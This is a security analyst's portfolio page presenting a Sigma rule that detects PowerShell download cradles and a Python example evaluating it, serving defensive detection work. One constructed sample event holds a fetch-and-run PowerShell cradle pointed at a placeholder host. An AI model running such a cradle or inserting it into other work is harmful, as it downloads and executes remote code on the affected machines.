Junior SOC analyst / blue team

Bartosz Reślinski

last detection rule shipped - 6d ago

I build ShieldEye - four open-source security tools for attack surface mapping, code analysis, network scanning and compliance. Defensive work by day, the toolkit is where I turn the repetitive parts into something reusable.

  • Top 1% TryHackMe, global
  • #1 TryHackMe, Poland
  • 4 open-source tools
  • HackerOne · Intigriti bug bounty

detections/win_susp_ps_cradle.yml
title: PowerShell Download Cradle
status: experimental
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'Net.WebClient'
            - 'DownloadString'
            - 'IEX'
    condition: selection
level: high
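
As an added example (not code from this page or from ShieldEye): a small Python evaluator of the selection above, run over constructed Sysmon-style process_creation events, to show how the rule's conditions combine: every field in the selection must match (AND), any value in a field's list is enough (OR), and Sigma string matching is case-insensitive.

```python
# Added example: evaluate the "PowerShell Download Cradle" Sigma selection
# against constructed process_creation events. Not part of the original page.

RULE_SELECTION = {
    "Image|endswith": ["\\powershell.exe"],
    "CommandLine|contains": ["Net.WebClient", "DownloadString", "IEX"],
}

def _field_matches(value, modifier, patterns):
    """Sigma list semantics: any one pattern satisfies the field (OR).
    Comparisons are case-insensitive, as in Sigma."""
    v = (value or "").lower()
    for p in patterns:
        p = p.lower()
        if modifier == "endswith" and v.endswith(p):
            return True
        if modifier == "contains" and p in v:
            return True
        if modifier is None and v == p:
            return True
    return False

def selection_matches(event, selection=RULE_SELECTION):
    """Sigma map semantics: every field in the selection must match (AND)."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if not _field_matches(event.get(field), modifier or None, patterns):
            return False
    return True

# Constructed sample events (not real telemetry); example.test is a placeholder host.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://example.test/a')\""},
    # Benign scheduled script: Image matches, CommandLine has no cradle token.
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
    # Token present but wrong Image: the AND across fields keeps this quiet.
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c echo DownloadString"},
]

def alerts(events):
    """Return the CommandLine of every event the selection fires on."""
    return [e["CommandLine"] for e in events if selection_matches(e)]

if __name__ == "__main__":
    for line in alerts(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Because only `\powershell.exe` is listed, the same cradle launched from pwsh.exe would not fire; whether to widen the Image list is a tuning decision against your own telemetry.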

What I do

Three angles on the same problem: keeping systems defensible.

defense

Detection & response

Day-to-day blue team work: writing Sigma rules, triaging alerts, and running a self-hosted Wazuh SIEM against real telemetry from a Windows endpoint with Sysmon.

tooling

Security tooling

Turning recurring tasks into reusable tools. Four scanners so far, each covering a different layer: external surface, source code, network, compliance. All open source, all MIT.

offense

Offensive practice

Keeping the attacker view sharp through TryHackMe (top 1% globally, #1 in Poland) and bug bounty on HackerOne and Intigriti. That perspective feeds back into what the defensive tools actually need to catch.

The toolkit

Four open-source security tools.

All projects